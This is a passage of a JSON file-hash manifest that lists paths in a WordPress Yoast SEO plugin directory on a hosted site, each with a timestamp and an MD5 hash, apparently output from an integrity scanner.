ess-seo\\/languages\\/yoast-components.php\":{\"d\":1545638232,\"h\":\"a485f904136e64756d6a92358af4e6ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-nb_NO.json\":{\"d\":1545638232,\"h\":\"5320e722d228f3a4537d15b86f1215e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-gl_ES.json\":{\"d\":1545638232,\"h\":\"e55236be336a01d4da8a701e6c4e91ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-fr_FR.json\":{\"d\":1545638232,\"h\":\"54b14845fba300d235ff3df7e7a04f41\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-fr_CA.json\":{\"d\":1545638232,\"h\":\"0ed9375178107feb1a0a02bb8d5ca450\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-es_AR.json\":{\"d\":1545638232,\"h\":\"c3afda408eaaac4ae6dcc8bcb16a9908\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-en_NZ.json\":{\"d\":1545638232,\"h\":\"41b45652937a91db8055dfc4b4f5af8d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-en_ZA.json\":{\"d\":1545638232,\"h\":\"3c281d5807352d3d657c10f794005096\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-bg_BG.json\":{\"d\":1545638232,\"h\":\"94ba15dd5b7ee39dfd0b5a92ef2ea230\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-da_DK.json\":{\"d\":1545638232,\"h\":\"40acd08f6f2091996017aa3407250a7e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-sr_RS.json\":{\"d\":1545638232,\"h\":\"166354d17c037861ee77c724174ec725\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-el.json\":{\"d\":1545638232,\"h\":\"131832883c0d560b44fd26a58a9c29d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-pl_PL.json\":{\"d\":1545638232,\"h\":\"01bd0dd7c0d367f93536f1f1ff252d68\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-gl_ES.json\":{\"d\":1545638232,\"h\":\"81b5369a63d32592008ba1ba82555773\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-es_ES.json\":{\"d\":1545638232,\"h\":\"7ed9be7aebd00911b86f5b0060d4f088\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-sk_SK.json\":{\"d\":1545638232,\"h\":\"cdaf6bd48de234711ad59eb839cc91c1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-es_MX.json\":{\"d\":1545638232,\"h\":\"4aa4f8db714a8f91064e364793831544\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-zh_CN.json\":{\"d\":1545638232,\"h\":\"1e6aade541d87062ddefc4c03f4e5007\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-pl_PL.json\":{\"d\":1545638232,\"h\":\"8ad233bed4651262a5c460344d175320\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-fr_FR.json\":{\"d\":1545638232,\"h\":\"237ffc143fadd0b133bf88aa85fa49da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoastseojsfiles.txt\":{\"d\":1545638232,\"h\":\"1a52928d11ee2d9d00b1b4a220dedf25\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-zh_CN.json\":{\"d\":1545638232,\"h\":\"b55213c9f1ad956f8b6ec9e0c46a67e3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-fa_IR.json\":{\"d\":1545638232,\"h\":\"71afc2cef7b2c9ebef3f412681196729\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-en_CA.json\":{\"d\":1545638232,\"h\":\"645bca742060efceaad9f24e6d26f5d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-en_ZA.json\":{\"d\":1545638232,\"h\":\"4c921012a2bd4b9651116a1dac58b0e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-zh_HK.json\":{\"d\":1545638232,\"h\":\"06eb87bb552eb86dbaddbf46a8825214\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-en_CA.json\":{\"d\":1545638232,\"h\":\"f6550b87e6dab7ba144c78a8cb38ec2e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-vi.json\":{\"d\":1545638232,\"h\":\"b145bf4db4ba13cb21cc8cf16e84d1fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-cs_CZ.json\":{\"d\":1545638232,\"h\":\"8801806149171a989ddced641bf76f5b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-hr.json\":{\"d\":1545638232,\"h\":\"7a67f36e00d36a67177996946f8c257c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-he_IL.json\":{\"d\":1545638232,\"h\":\"340c1e702a29f5b89213f9399dbc7b89\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-en_GB.json\":{\"d\":1545638232,\"h\":\"125a938e043d24fe6c77950e6292395e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-en_AU.json\":{\"d\":1545638232,\"h\":\"6a5c8537c69a6d3f3b8ecf9eab6c2604\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-pt_BR.json\":{\"d\":1545638232,\"h\":\"70d71d9108099b928cf574376687846c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-de_DE.json\":{\"d\":1545638232,\"h\":\"44222e034d05903c607b732fc5988dd7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-fi.json\":{\"d\":1545638232,\"h\":\"6b974a53243bd4c9f99eca97436e002d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-fr_CA.json\":{\"d\":1545638232,\"h\":\"800f4f2eaa8ab94bd0a26e189bba6407\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-ru_RU.json\":{\"d\":1545638232,\"h\":\"9070e84712ffb08ea3c075dc856535f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-bg_BG.json\":{\"d\":1545638232,\"h\":\"3ae0198ddd96b62ad8353608ff4160e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-hu_HU.json\":{\"d\":1545638232,\"h\":\"0eb5bf892eb6decfbb98ba75e280921b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-tr_TR.json\":{\"d\":1545638232,\"h\":\"8627d0a64b18fa6487ea8be7be52543b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-en_AU.json\":{\"d\":1545638232,\"h\":\"65ef98fc161342f1594d5a0b5466c6b7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-el.json\":{\"d\":1545638232,\"h\":\"52be8c308f41f28566c06632c2183c4d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-da_DK.json\":{\"d\":1545638232,\"h\":\"18a08419bc001ee1eb96c87d1acf75e1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-en_AU.json\":{\"d\":1545638232,\"h\":\"42975a49493b1a0dc1129e5d58126588\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-ca.json\":{\"d\":1545638232,\"h\":\"ac982a1bf7536b0dac816295c6253301\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-vi.json\":{\"d\":1545638232,\"h\":\"da131c1a8258213dbaf17ec6b223c3e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-uk.json\":{\"d\":1545638232,\"h\":\"8b145a86a4a67175c4ced8e84bf231be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-ca.json\":{\"d\":1545638232,\"h\":\"b6f28aa7fbcd92acd3079e41dd6e4436\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-fr_CA.json\":{\"d\":1545638232,\"h\":\"33128c75dd4ef0065c37bc2606d67fd4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-es_AR.json\":{\"d\":1545638232,\"h\":\"8158830242e5da25c39004697e4950b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-uk.json\":{\"d\":1545638232,\"h\":\"0d7d883a803fc84dea2a057b33d2c852\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-ro_RO.json\":{\"d\":1545638232,\"h\":\"04a6bf6c47045f76309050af45af0236\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-fa_IR.json\":{\"d\":1545638232,\"h\":\"693c039fbba6189b94285f067d1e1eb6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-sk_SK.json\":{\"d\":1545638232,\"h\":\"3aad0adbe3a4812d9dffbd306b7084cd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/yoast-components-it_IT.json\":{\"d\":1545638232,\"h\":\"84466d0a6c8fd1e0ab8b5259408faf09\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-da_DK.json\":{\"d\":1545638232,\"h\":\"b9142006af75b95731a0cf8264d2029c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-es_VE.json\":{\"d\":1545638232,\"h\":\"44046d11d34c4ebacf07b4a602e2ef5f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-en_GB.json\":{\"d\":1545638232,\"h\":\"5e7cf5d3224a664bea7ee0538d38b153\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seo-nb_NO.json\":{\"d\":1545638232,\"h\":\"09925a82af6710b449b370a18e637ab7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/languages\\/wordpress-seojs-en_ZA.json\":{\"d\":1545638232,\"h\":\"a4a654273361f842017b26f84e92d064\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/license-manager\\/views\\/form.php\":{\"d\":1545638232,\"h\":\"5aa8ee5e09c3b59b61c6e74343633df4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/license-manager\\/views\\/index.php\":{\"d\":1545638232,\"h\":\"364cec32d3b2896bb5313a84f54280c8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/license-manager\\/views\\/script.php\":{\"d\":1545638232,\"h\":\"8d8207449c564f4797c7d2703cb6336b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/license-manager\\/class-api-request.php\":{\"d\":1545638232,\"h\":\"6959d8b20cb57907d26fc9328bfdc941\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/license-manager\\/class-plugin-license-manager.php\":{\"d\":1545638232,\"h\":\"ff4fdc3feb24b32231e6c54e31d14cf6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/license-manager\\/class-plugin-update-manager.php\":{\"d\":1545638232,\"h\":\"5dd9fb8f32fa06da0647f641a18f7fc9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/license-manager\\/index.php\":{\"d\":1545638232,\"h\":\"364cec32d3b2896bb5313a84f54280c8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/license-manager\\/class-product.php\":{\"d\":1545638232,\"h\":\"e37891d54bf902ed794d15d97e67a66b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/license-manager\\/class-update-manager.php\":{\"d\":1545638232,\"h\":\"1cee95be00b6b75f88ef930e54467e47\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/license-manager\\/class-license-manager.php\":{\"d\":1545638232,\"h\":\"a0a5bdb8a9aeab8268752acb7323b094\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/license-manager\\/CHANGELOG.md\":{\"d\":1545638232,\"h\":\"9d571517264143a08f4bb6c45c85f7f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/i18n-module\\/src\\/i18n-module.php\":{\"d\":1545638232,\"h\":\"ec4a37e7b4fde7e10dc57b1ca6679eff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/i18n-module\\/src\\/i18n-module-wordpressorg.php\":{\"d\":1545638232,\"h\":\"46a21844f50665c655f40e9864201367\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/i18n-module\\/CHANGELOG.md\":{\"d\":1545638232,\"h\":\"85c4b645ea77be84d0ed5d87142c8bd1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/service\\/Google_BatchRequest.php\":{\"d\":1545638232,\"h\":\"b384420af6ee85b54d736e678b24ae1a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/service\\/Google_ServiceResource.php\":{\"d\":1545638232,\"h\":\"2dcb4d2b2b0d00a85671c2bb4e86c28f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/service\\/Google_MediaFileUpload.php\":{\"d\":1545638232,\"h\":\"4116ceb1e809eaa5ba3b94416a7cc157\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/service\\/Google_Utils.php\":{\"d\":1545638232,\"h\":\"ee855b579bcdd34667d4b4c309c6328f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/service\\/Google_Model.php\":{\"d\":1545638232,\"h\":\"4f19707bcd70b314d27b6685014e5ad8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/service\\/Google_Service.php\":{\"d\":1545638232,\"h\":\"ec8a0d396772ea1bcbffa730bb213343\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/external\\/URITemplateParser.php\":{\"d\":1545638232,\"h\":\"dc829ddd424801e2bc4bf83bfb5e698c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/auth\\/Google_LoginTicket.php\":{\"d\":1545638232,\"h\":\"1940b66e883dfc149f811bb8e18ee27d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/auth\\/Google_AssertionCredentials.php\":{\"d\":1545638232,\"h\":\"347509bcad7389e6c5f81b98324008a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/auth\\/Google_OAuth2.php\":{\"d\":1545638232,\"h\":\"096eddf13bedc0163c62b85d83569110\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/auth\\/Google_PemVerifier.php\":{\"d\":1545638232,\"h\":\"d4809b10e2f9eb2f2437a14ca9e73817\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/auth\\/Google_Auth.php\":{\"d\":1545638232,\"h\":\"8a07098941ce118f7084e69d0aff3198\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/auth\\/Google_AuthNone.php\":{\"d\":1545638232,\"h\":\"a3946bcf8b60a092d60744dee1266268\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/auth\\/Google_Signer.php\":{\"d\":1545638232,\"h\":\"ed78766d5af59b6aee16ef014dab316c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/auth\\/Google_Verifier.php\":{\"d\":1545638232,\"h\":\"851557c80027139df2f9350125db07c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/auth\\/Google_P12Signer.php\":{\"d\":1545638232,\"h\":\"2f66588beef914e30cd60451f914ff8a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/io\\/cacerts.pem\":{\"d\":1545638232,\"h\":\"0d806fdc81ab8ec35c05b7dc869dd208\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/io\\/Google_CurlIO.php\":{\"d\":1545638232,\"h\":\"b02d7b9832ea0a3c69d172d264b64d93\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/io\\/Google_WPIO.php\":{\"d\":1545638232,\"h\":\"f16891c52027590e507087d073c3b071\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/io\\/Google_CacheParser.php\":{\"d\":1545638232,\"h\":\"351bfee9e04c3c3cc5a07b1bb2158e87\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/io\\/Google_IO.php\":{\"d\":1545638232,\"h\":\"28a5eded74ca33ee82fbb2867bf793a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/io\\/Google_REST.php\":{\"d\":1545638232,\"h\":\"e4d006ff7aad82ea3eb234dd60b3fd66\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/io\\/Google_HttpRequest.php\":{\"d\":1545638232,\"h\":\"fb4f60d443ed475226b2b5950a0e0273\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/cache\\/Google_Cache.php\":{\"d\":1545638232,\"h\":\"23496c6bfc015794fa459d7e92ef3af0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/cache\\/Google_WPCache.php\":{\"d\":1545638232,\"h\":\"c789103a392b78860108f9716fc866cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/Google_Client.php\":{\"d\":1545638232,\"h\":\"8efa3083e79bd1e5b9e6f393f823b471\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/google\\/config.php\":{\"d\":1545638232,\"h\":\"73ee822eb83ebed1ff1a0f638f9aa4a5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/class-api-google-client.php\":{\"d\":1545638232,\"h\":\"a1767c649e80bfb344685099bf4ab1ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/class-api-libs.php\":{\"d\":1545638232,\"h\":\"35262d1c9fd3d5f258c535e19feb8ecc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/yoast\\/api-libs\\/class-api-google.php\":{\"d\":1545638232,\"h\":\"96ec370173148c3913f649546e5f4dfc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/psr\\/log\\/Psr\\/Log\\/Test\\/LoggerInterfaceTest.php\":{\"d\":1545638232,\"h\":\"660a7ddd367dbf434c5ec6e463149d42\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/psr\\/log\\/Psr\\/Log\\/NullLogger.php\":{\"d\":1545638232,\"h\":\"d66f51c1fc729b09e54fd8821c7dfe46\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/psr\\/log\\/Psr\\/Log\\/LoggerInterface.php\":{\"d\":1545638232,\"h\":\"1ae09682227159416a299d0ea940d34e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/psr\\/log\\/Psr\\/Log\\/AbstractLogger.php\":{\"d\":1545638232,\"h\":\"26eb607e5318188016615326bd89a9be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/psr\\/log\\/Psr\\/Log\\/LoggerAwareTrait.php\":{\"d\":1545638232,\"h\":\"221f47ac7d3da4800d2c0e26cdfb351b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/psr\\/log\\/Psr\\/Log\\/LogLevel.php\":{\"d\":1545638232,\"h\":\"cc226142fd5d390d030b39c61cf97843\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/psr\\/log\\/Psr\\/Log\\/InvalidArgumentException.php\":{\"d\":1545638232,\"h\":\"7d2f0bd1583524d739fff12f0507de65\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/psr\\/log\\/Psr\\/Log\\/LoggerTrait.php\":{\"d\":1545638232,\"h\":\"d1152080b1b7a8812f6a3023b63f0fc0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/psr\\/log\\/Psr\\/Log\\/LoggerAwareInterface.php\":{\"d\":1545638232,\"h\":\"cfac6d4dc3ebf2c7f0e49f74d1bcd44a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/psr\\/log\\/LICENSE\":{\"d\":1545638232,\"h\":\"1a74629072fd794937be394ab689327e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/psr\\/container\\/src\\/ContainerInterface.php\":{\"d\":1545638232,\"h\":\"d459395043420a1cfde26c94500f5b66\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/psr\\/container\\/src\\/NotFoundExceptionInterface.php\":{\"d\":1545638232,\"h\":\"8fc6d3d2099bf1fd8d03a3273157c8d3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/psr\\/container\\/src\\/ContainerExceptionInterface.php\":{\"d\":1545638232,\"h\":\"d7a4fda88b943f658e13f7f5aa3e85f1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/psr\\/container\\/LICENSE\":{\"d\":1545638232,\"h\":\"7320ae3aa92f4b6525f59c24ab170cf6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor\\/composer\\/ClassLoader52.php\":{\"d\":1545638232,\"h\":\"c8b909e2a65a5e